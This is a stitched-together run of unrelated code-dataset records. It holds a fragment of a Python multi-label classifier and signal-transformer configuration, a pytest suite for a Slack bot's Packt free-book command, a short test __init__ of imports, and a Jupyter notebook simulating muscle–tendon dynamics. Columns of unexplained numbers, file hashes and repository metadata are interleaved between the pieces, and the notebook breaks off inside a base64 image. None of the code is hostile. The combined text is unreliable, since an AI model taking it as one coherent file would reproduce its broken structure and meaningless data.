    RakelD(MLPClassifier(hidden_layer_sizes=(100, 100, 100), learning_rate='adaptive', solver='adam')),
    RakelD(MLPClassifier(hidden_layer_sizes=(100, 100, 100), learning_rate='adaptive', solver='adam'),
           labelset_size=5),
    RakelD(MLPClassifier(hidden_layer_sizes=(100, 100), learning_rate='adaptive', solver='adam')),
    RakelD(MLPClassifier(hidden_layer_sizes=(100, 100), learning_rate='adaptive', solver='adam'),
           labelset_size=5),
    RakelD(MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam')),
    RakelD(MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam'),
           labelset_size=5),
    RakelD(MLPClassifier(hidden_layer_sizes=(2000,), learning_rate='adaptive', solver='adam')),
    RakelD(MLPClassifier(hidden_layer_sizes=(2000,), learning_rate='adaptive', solver='adam'),
           labelset_size=5),
    RakelD(base_classifier=GaussianNB(), base_classifier_require_dense=[True, True], labelset_size=3),
    RakelD(base_classifier=GaussianNB(), base_classifier_require_dense=[True, True], labelset_size=5),
    RakelD(base_classifier=GaussianNB(), base_classifier_require_dense=[True, True], labelset_size=7),
]
# Wavelet transformer candidates: default settings, and a variant that drops
# the approximation coefficients (drop_cA=True). Exact wavelet family and
# level live in TransformerFactory (project code) — TODO confirm defaults.
model_selection_wavelets = [
TransformerFactory.build_wavelet(),
TransformerFactory.build_wavelet(drop_cA=True)
]
# Time-delay-embedding candidates: varying delay (seconds) and embedding
# dimension. Semantics of delay_in_seconds depend on the sampling rate
# handled inside TransformerFactory — TODO confirm against project code.
model_selection_delay_embeddings = [
TransformerFactory.build_delay_embedding(delay_in_seconds=30, dimension=6),
TransformerFactory.build_delay_embedding(delay_in_seconds=32, dimension=8),
TransformerFactory.build_delay_embedding(delay_in_seconds=6, dimension=8),
TransformerFactory.build_delay_embedding(delay_in_seconds=12, dimension=8)
]
# Single fixed configurations (presumably the winners of the selection runs
# above — TODO confirm) used for cross-validation of the signal2vec and
# BOSS pipelines.
cv_signal2vec = [TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=1)]
cv_signal2vec_clf = [MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive',
solver='adam', activation='logistic')]
cv_boss_clf = [MLPClassifier(hidden_layer_sizes=(2000, 100, 100), learning_rate='adaptive', solver='adam')]
cv_boss = [TransformerFactory.build_pyts_boss(word_size=2, n_bins=2, window_size=10,
norm_mean=False, norm_std=False)]
# Final "state of the art" configurations: one classifier list and one
# transformer list per representation. The two lists appear to be consumed
# pairwise (n-th classifier with n-th transformer) — which is presumably why
# WAVELETS and TIME_DELAY_EMBEDDING repeat the same transformer twice, once
# per classifier; TODO confirm against the consuming code.
state_of_the_art = {
SIGNAL2VEC : {
CLF_MODELS : [MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive',
solver='adam', activation='logistic')],
TRANSFORMER_MODELS: [TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=1)]
},
WAVELETS : {
# Two classifiers, so the wavelet transformer is listed twice.
CLF_MODELS : [MLkNN(ignore_first_neighbours=0, k=3, s=1.0),
RakelD(MLPClassifier(hidden_layer_sizes=(100, 100, 100), learning_rate='adaptive',
solver='adam'), labelset_size=5)],
TRANSFORMER_MODELS: [TransformerFactory.build_wavelet(), TransformerFactory.build_wavelet()]
},
TIME_DELAY_EMBEDDING: {
CLF_MODELS : [
MLkNN(ignore_first_neighbours=0, k=3, s=1.0),
RakelD(MLPClassifier(hidden_layer_sizes=(100, 100, 100), learning_rate='adaptive',
solver='adam'), labelset_size=5)
],
# Same embedding (30 s delay, dimension 6) duplicated for both classifiers.
TRANSFORMER_MODELS: [TransformerFactory.build_delay_embedding(delay_in_seconds=30, dimension=6),
TransformerFactory.build_delay_embedding(delay_in_seconds=30, dimension=6)
]
},
BOSS : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(2000, 100, 100), learning_rate='adaptive', solver='adam')],
TRANSFORMER_MODELS: [TransformerFactory.build_pyts_boss(word_size=2, n_bins=4, window_size=10,
norm_mean=False, norm_std=False)]
}
}
| 57.540373
| 120
| 0.641429
| 5,005
| 46,320
| 5.582617
| 0.027173
| 0.148993
| 0.109087
| 0.131813
| 0.965606
| 0.964246
| 0.958734
| 0.956694
| 0.956265
| 0.933109
| 0
| 0.048154
| 0.253087
| 46,320
| 804
| 121
| 57.61194
| 0.759459
| 0
| 0
| 0.71465
| 0
| 0
| 0.044063
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.011465
| 0
| 0.011465
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
44cf2f800a067a76883efd6befb27bcd48e634b6
| 3,964
|
py
|
Python
|
tests/apps/info/packtpub_test.py
|
item4/yui
|
8628d0d54b94ada3cbe7d1b0f624063258bad10a
|
[
"MIT"
] | 36
|
2017-06-12T01:09:46.000Z
|
2021-01-31T17:57:41.000Z
|
tests/apps/info/packtpub_test.py
|
item4/yui
|
8628d0d54b94ada3cbe7d1b0f624063258bad10a
|
[
"MIT"
] | 145
|
2017-06-21T13:31:29.000Z
|
2021-06-20T01:01:30.000Z
|
tests/apps/info/packtpub_test.py
|
item4/yui
|
8628d0d54b94ada3cbe7d1b0f624063258bad10a
|
[
"MIT"
] | 21
|
2017-07-24T15:53:19.000Z
|
2021-12-23T04:18:31.000Z
|
from freezegun import freeze_time
import pytest
from yui.apps.info.packtpub import PACKTPUB_URL
from yui.apps.info.packtpub import auto_packtpub_dotd
from yui.apps.info.packtpub import packtpub_dotd
from yui.utils import json
from yui.utils.datetime import datetime
from ...util import FakeBot
@pytest.mark.asyncio
@freeze_time(datetime(2018, 10, 7))
async def test_no_packtpub_dotd(bot, response_mock):
    """The command apologizes when no free book is offered today."""
    # The handler queries the offers endpoint for the (frozen) current day;
    # an empty `data` payload means there is no deal-of-the-day.
    offers_url = (
        'https://services.packtpub.com/free-learning-v1/offers'
        '?dateFrom=2018-10-07T00:00:00.000Z&dateTo=2018-10-08T00:00:00.000Z'
    )
    response_mock.get(
        offers_url,
        body=json.dumps({'data': []}),
        headers={'Content-Type': 'application/json'},
    )

    bot.add_channel('C1', 'general')
    bot.add_user('U1', 'item4')
    message = bot.create_message('C1', 'U1')

    await packtpub_dotd(bot, message)

    reply = bot.call_queue.pop(0)
    assert reply.method == 'chat.postMessage'
    assert reply.data['channel'] == 'C1'
    assert reply.data['text'] == '오늘은 PACKT Book의 무료책이 없는 것 같아요'
@pytest.mark.asyncio
@freeze_time(datetime(2018, 10, 7))
async def test_packtpub_dotd(bot, response_mock):
    """The command announces today's free book with a rich attachment."""
    product_id = '11223344'
    title = 'test book'
    image_url = 'test url'

    # The offers endpoint yields one product id for the frozen day ...
    response_mock.get(
        'https://services.packtpub.com/free-learning-v1/offers'
        '?dateFrom=2018-10-07T00:00:00.000Z&dateTo=2018-10-08T00:00:00.000Z',
        body=json.dumps({'data': [{'productId': product_id}]}),
        headers={'Content-Type': 'application/json'},
    )
    # ... and the summary endpoint resolves it to a title and cover image.
    response_mock.get(
        f'https://static.packt-cdn.com/products/{product_id}/summary',
        body=json.dumps({'title': title, 'coverImage': image_url}),
        headers={'Content-Type': 'application/json'},
    )

    bot.add_channel('C1', 'general')
    bot.add_user('U1', 'item4')
    message = bot.create_message('C1', 'U1')

    await packtpub_dotd(bot, message)

    reply = bot.call_queue.pop(0)
    assert reply.method == 'chat.postMessage'
    assert reply.data['channel'] == 'C1'
    assert reply.data['text'] == '오늘자 PACKT Book의 무료책이에요!'

    attachments = reply.data['attachments']
    assert len(attachments) == 1
    attachment = attachments[0]
    assert attachment['fallback'] == f'{title} - {PACKTPUB_URL}'
    assert attachment['title'] == title
    assert attachment['title_link'] == PACKTPUB_URL
    assert attachment['text'] == (
        f'오늘의 Packt Book Deal of The Day: {title} - {PACKTPUB_URL}'
    )
    assert attachment['image_url'] == image_url
@pytest.mark.asyncio
@freeze_time(datetime(2018, 10, 7))
async def test_auto_packtpub_dotd(bot_config, response_mock):
    """The scheduled task posts today's free book to the configured channel."""
    # The task runs daily at 09:05 (cron "5 9 * * *").
    assert auto_packtpub_dotd.cron.spec == '5 9 * * *'

    product_id = '11223344'
    title = 'test book'
    image_url = 'test url'

    # Same two-step API flow as the command: offers, then product summary.
    response_mock.get(
        'https://services.packtpub.com/free-learning-v1/offers'
        '?dateFrom=2018-10-07T00:00:00.000Z&dateTo=2018-10-08T00:00:00.000Z',
        body=json.dumps({'data': [{'productId': product_id}]}),
        headers={'Content-Type': 'application/json'},
    )
    response_mock.get(
        f'https://static.packt-cdn.com/products/{product_id}/summary',
        body=json.dumps({'title': title, 'coverImage': image_url}),
        headers={'Content-Type': 'application/json'},
    )

    # The auto task resolves its target channel from bot config, not from an
    # incoming event, so a FakeBot is built here rather than injected.
    bot_config.CHANNELS = {
        'general': 'general',
    }
    bot = FakeBot(bot_config)
    bot.add_channel('C1', 'general')

    await auto_packtpub_dotd(bot)

    reply = bot.call_queue.pop(0)
    assert reply.method == 'chat.postMessage'
    assert reply.data['channel'] == 'C1'
    assert reply.data['text'] == '오늘자 PACKT Book의 무료책이에요!'

    attachments = reply.data['attachments']
    assert len(attachments) == 1
    attachment = attachments[0]
    assert attachment['fallback'] == f'{title} - {PACKTPUB_URL}'
    assert attachment['title'] == title
    assert attachment['title_link'] == PACKTPUB_URL
    assert attachment['text'] == (
        f'오늘의 Packt Book Deal of The Day: {title} - {PACKTPUB_URL}'
    )
    assert attachment['image_url'] == image_url
| 33.880342
| 77
| 0.656408
| 525
| 3,964
| 4.832381
| 0.209524
| 0.067008
| 0.07095
| 0.06622
| 0.879385
| 0.849428
| 0.837998
| 0.808829
| 0.808829
| 0.808829
| 0
| 0.053329
| 0.181635
| 3,964
| 116
| 78
| 34.172414
| 0.72873
| 0
| 0
| 0.729167
| 0
| 0.03125
| 0.3055
| 0.04995
| 0
| 0
| 0
| 0
| 0.229167
| 1
| 0
| false
| 0
| 0.083333
| 0
| 0.083333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
44d6dcbf7e04185aedfb4e86782b25cb084a34c7
| 102
|
py
|
Python
|
test/__init__.py
|
zosiakropka/rich-text-py
|
a317da6cbd9e0d06e98e2cfcf43f9c3b0c5b091b
|
[
"MIT"
] | 1
|
2016-04-06T22:46:47.000Z
|
2016-04-06T22:46:47.000Z
|
test/__init__.py
|
zosiakropka/rich-text-py
|
a317da6cbd9e0d06e98e2cfcf43f9c3b0c5b091b
|
[
"MIT"
] | null | null | null |
test/__init__.py
|
zosiakropka/rich-text-py
|
a317da6cbd9e0d06e98e2cfcf43f9c3b0c5b091b
|
[
"MIT"
] | null | null | null |
from test_attributes import *
from test_iterator import *
from test_iz import *
from test_op import *
| 20.4
| 29
| 0.803922
| 16
| 102
| 4.875
| 0.4375
| 0.410256
| 0.538462
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.156863
| 102
| 4
| 30
| 25.5
| 0.906977
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
789b7c858bdc94d1e217ec4c670d2b9c2d8fb55a
| 82,789
|
py
|
Python
|
courses/modsim2018/tasks/Tasks_For&During_Lecture13/CodeOfFriend.py
|
raissabthibes/bmc
|
840800fb94ea3bf188847d0771ca7197dfec68e3
|
[
"MIT"
] | null | null | null |
courses/modsim2018/tasks/Tasks_For&During_Lecture13/CodeOfFriend.py
|
raissabthibes/bmc
|
840800fb94ea3bf188847d0771ca7197dfec68e3
|
[
"MIT"
] | null | null | null |
courses/modsim2018/tasks/Tasks_For&During_Lecture13/CodeOfFriend.py
|
raissabthibes/bmc
|
840800fb94ea3bf188847d0771ca7197dfec68e3
|
[
"MIT"
] | null | null | null |
{
"cells": [
{
"cell_type": "markdown",
"metadata": {},
"source": [
"# Task 12 - Motor Control\n",
"### Introduction to modeling and simulation of human movement\n",
"https://github.com/BMClab/bmc/blob/master/courses/ModSim2018.md"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"Desiree Miraldo \n",
"Renato Watanabe\n",
"\n",
"\n",
"* Based on task for Lecture 11 (+ muscle activation dynamics + pennation angle):\n",
"\n",
"Change the derivative of the contractile element length function. The new function must compute the derivative according to the article from Thelen (2003) (Eqs. (1), (2), (6) and (7)):\n",
"\n",
" Thelen D; Adjustment of muscle mechanics model parameters to simulate dynamic contractions in older adults (2003)"
]
},
{
"cell_type": "code",
"execution_count": 1,
"metadata": {},
"outputs": [],
"source": [
"import numpy as np\n",
"#import pandas as pd\n",
"import matplotlib.pyplot as plt\n",
"import math\n",
"\n",
"%matplotlib notebook"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### Muscle properties"
]
},
{
"cell_type": "code",
"execution_count": 2,
"metadata": {},
"outputs": [],
"source": [
"Lslack = .223\n",
"Umax = .04\n",
"Lce_o = .093 #optimal length\n",
"width = .63#*Lce_o\n",
"Fmax = 7400\n",
"a = 0\n",
"u = 0.5\n",
"#b = .25*10#*Lce_o "
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### Initial conditions"
]
},
{
"cell_type": "code",
"execution_count": 3,
"metadata": {},
"outputs": [],
"source": [
"Lnorm_ce = .087/Lce_o #norm\n",
"t0 = 0\n",
"tf = 5\n",
"h = 1e-3"
]
},
{
"cell_type": "code",
"execution_count": 4,
"metadata": {},
"outputs": [],
"source": [
"t = np.arange(t0,tf,h)\n",
"F = np.empty(t.shape)\n",
"Fkpe = np.empty(t.shape)\n",
"FiberLen = np.empty(t.shape)\n",
"TendonLen = np.empty(t.shape)\n",
"a_dynamics = np.empty(t.shape)"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Simulation - Series"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"for i in range (len(t)):\n",
" #ramp\n",
" if t[i]<=1:\n",
" Lm = 0.31\n",
" elif t[i]>1 and t[i]<2:\n",
" Lm = .31 + .1*(t[i]-1)\n",
" #print(Lm)\n",
" \n",
" #shortening at 4cm/s\n",
" Lsee = Lm - Lce\n",
" \n",
" if Lsee<Lslack: \n",
" F[i] = 0\n",
" else: \n",
" F[i] = Fmax*((Lsee-Lslack)/(Umax*Lslack))**2\n",
" \n",
" \n",
" #isometric force at Lce from CE force length relationship\n",
" F0 = max([0, Fmax*(1-((Lce-Lce_o)/width)**2)])\n",
" \n",
" #calculate CE velocity from Hill's equation\n",
" if F[i]>F0: print('Error: cannot do eccentric contractions')\n",
" \n",
" Lcedot = -b*(F0-F[i])/(F[i]+a) #vel is negative for shortening\n",
" \n",
" # --- Euler integration step\n",
" Lce += h*Lcedot\n",
"\n",
" "
]
},
{
"cell_type": "code",
"execution_count": 5,
"metadata": {},
"outputs": [],
"source": [
"def TendonForce (Lnorm_see,Lslack, Lce_o):\n",
" '''\n",
" Compute tendon force\n",
"\n",
" Inputs:\n",
" Lnorm_see = normalized tendon length\n",
" Lslack = slack length of the tendon (non-normalized)\n",
" Lce_o = optimal length of the fiber\n",
" \n",
" Output:\n",
" Fnorm_tendon = normalized tendon force\n",
" \n",
" '''\n",
" Umax = .04\n",
" \n",
" if Lnorm_see<Lslack/Lce_o: \n",
" Fnorm_tendon = 0\n",
" else: \n",
" Fnorm_tendon = ((Lnorm_see-Lslack/Lce_o)/(Umax*Lslack/Lce_o))**2\n",
" \n",
" return Fnorm_tendon"
]
},
{
"cell_type": "code",
"execution_count": 6,
"metadata": {},
"outputs": [],
"source": [
"def ParallelElementForce (Lnorm_ce):\n",
" '''\n",
" Compute parallel element force\n",
" \n",
" Inputs:\n",
" Lnorm_ce = normalized contractile element length\n",
" \n",
" Output:\n",
" Fnorm_kpe = normalized parallel element force\n",
"\n",
" '''\n",
" Umax = 1\n",
" \n",
" if Lnorm_ce< 1: \n",
" Fnorm_kpe = 0\n",
" else: \n",
" Fnorm_kpe = ((Lnorm_ce-1)/(Umax*1))**2 \n",
" \n",
" return Fnorm_kpe"
]
},
{
"cell_type": "code",
"execution_count": 7,
"metadata": {},
"outputs": [],
"source": [
"def ForceLengthCurve (Lnorm_ce,width):\n",
" F0 = max([0, (1-((Lnorm_ce-1)/width)**2)])\n",
" return F0"
]
},
{
"cell_type": "markdown",
"metadata": {
"collapsed": true
},
"source": [
"def ContractileElementDot(F0, Fnorm_CE, a, b):\n",
" \n",
" '''\n",
" Compute Contractile Element Derivative\n",
"\n",
" Inputs:\n",
" F0 = Force-Length Curve\n",
" Fce = Contractile element force\n",
" \n",
" Output:\n",
" Lnorm_cedot = normalized contractile element length derivative\n",
"\n",
" '''\n",
" \n",
" if Fnorm_CE>F0: print('Error: cannot do eccentric contractions')\n",
" \n",
" Lnorm_cedot = -b*(F0-Fnorm_CE)/(Fnorm_CE + a) #vel is negative for shortening\n",
" \n",
" return Lnorm_cedot"
]
},
{
"cell_type": "code",
"execution_count": 8,
"metadata": {},
"outputs": [],
"source": [
"def ContractileElementDot(F0, Fnorm_CE, a):\n",
" \n",
" '''\n",
" Compute Contractile Element Derivative\n",
"\n",
" Inputs:\n",
" F0 = Force-Length Curve\n",
" Fce = Contractile element force\n",
" \n",
" Output:\n",
" Lnorm_cedot = normalized contractile element length derivative\n",
"\n",
" '''\n",
" \n",
" FMlen = 1.4 # young adults\n",
" Vmax = 10 # young adults\n",
" Af = 0.25 #force-velocity shape factor\n",
" \n",
" Fnorm_CE = min(FMlen*a*F0 - 0.001, Fnorm_CE)\n",
" \n",
" if Fnorm_CE > a*F0:\n",
" \n",
" b = ((2 + 2/Af)*(a*F0*FMlen - Fnorm_CE))/(FMlen-1)\n",
" \n",
" elif Fnorm_CE <= a*F0:\n",
" \n",
" b = a*F0 + Fnorm_CE/Af\n",
" \n",
" Lnorm_cedot = (.25 + .75*a)*Vmax*((Fnorm_CE - a*F0)/b)\n",
" \n",
" return Lnorm_cedot"
]
},
{
"cell_type": "code",
"execution_count": 9,
"metadata": {},
"outputs": [],
"source": [
"def ContractileElementForce(Fnorm_tendon,Fnorm_kpe, alpha):\n",
" '''\n",
" Compute Contractile Element force\n",
"\n",
" Inputs:\n",
" Fnorm_tendon = normalized tendon force\n",
" Fnorm_kpe = normalized parallel element force\n",
" \n",
" Output:\n",
" Fnorm_CE = normalized contractile element force\n",
" '''\n",
" Fnorm_CE = Fnorm_tendon/np.cos(alpha) - Fnorm_kpe\n",
" return Fnorm_CE"
]
},
{
"cell_type": "code",
"execution_count": 10,
"metadata": {},
"outputs": [],
"source": [
"def tendonLength(Lm,Lce_o,Lnorm_ce, alpha):\n",
" '''\n",
" Compute tendon length\n",
" \n",
" Inputs:\n",
" Lm = \n",
" Lce_o = optimal length of the fiber\n",
" Lnorm_ce = normalized contractile element length\n",
" \n",
" Output:\n",
" Lnorm_see = normalized tendon length \n",
" '''\n",
" Lnorm_see = Lm/Lce_o - Lnorm_ce*np.cos(alpha)\n",
" \n",
" return Lnorm_see"
]
},
{
"cell_type": "code",
"execution_count": 11,
"metadata": {},
"outputs": [],
"source": [
"def activation(a,u,dt):\n",
" '''\n",
" Compute activation\n",
" \n",
" Inputs:\n",
" u = idealized muscle excitation signal, 0 <= u <= 1\n",
" a = muscular activation\n",
" dt = time step\n",
" \n",
" Output:\n",
" a = muscular activation \n",
" '''\n",
" \n",
" tau_deact = 50e-3 #young adults\n",
" tau_act = 15e-3\n",
" \n",
" if u>a:\n",
" tau_a = tau_act*(0.5+1.5*a)\n",
" elif u <=a:\n",
" tau_a = tau_deact/(0.5+1.5*a)\n",
" \n",
" #-------\n",
" dadt = (u-a)/tau_a # euler\n",
" \n",
" a += dadt*dt\n",
" #-------\n",
" return a"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Simulation - Parallel"
]
},
{
"cell_type": "code",
"execution_count": 12,
"metadata": {},
"outputs": [],
"source": [
"#Normalizing\n",
"alpha = 25*np.pi/180\n",
"for i in range (len(t)):\n",
" #ramp\n",
" if t[i]<=1:\n",
" Lm = 0.31\n",
" elif t[i]>1 and t[i]<2:\n",
" Lm = .31 - .04*(t[i]-1)\n",
" #print(Lm)\n",
" \n",
" #shortening at 4cm/s\n",
" u = 0.7 + 0.2*np.sin(np.pi*t[i])\n",
" \n",
" Lnorm_see = tendonLength(Lm,Lce_o,Lnorm_ce, alpha)\n",
"\n",
" Fnorm_tendon = TendonForce (Lnorm_see,Lslack, Lce_o) \n",
" \n",
" Fnorm_kpe = ParallelElementForce (Lnorm_ce) \n",
" \n",
" #isometric force at Lce from CE force length relationship\n",
" F0 = ForceLengthCurve (Lnorm_ce,width)\n",
" \n",
" Fnorm_CE = ContractileElementForce(Fnorm_tendon,Fnorm_kpe, alpha) #Fnorm_CE = ~Fm\n",
" \n",
" #computing activation\n",
" a = activation(a,u,h)\n",
" \n",
" #calculate CE velocity from Hill's equation \n",
" Lnorm_cedot = ContractileElementDot(F0, Fnorm_CE,a)\n",
" \n",
" # --- Euler integration step\n",
" Lnorm_ce += h*Lnorm_cedot\n",
"\n",
" \n",
" F[i] = Fnorm_tendon*Fmax\n",
" Fkpe[i] = Fnorm_kpe*Fmax\n",
" FiberLen[i] = Lnorm_ce*Lce_o\n",
" TendonLen[i] = Lnorm_see*Lce_o\n",
" a_dynamics[i] = a\n",
" "
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Plots "
]
},
{
"cell_type": "code",
"execution_count": 13,
"metadata": {
"scrolled": false
},
"outputs": [
{
"name": "stderr",
"output_type": "stream",
"text": [
"/opt/miniconda3/lib/python3.6/site-packages/matplotlib/axes/_axes.py:545: UserWarning: No labelled objects found. Use label='...' kwarg on individual plots.\n",
" warnings.warn(\"No labelled objects found. \"\n"
]
},
{
"data": {
"image/png": "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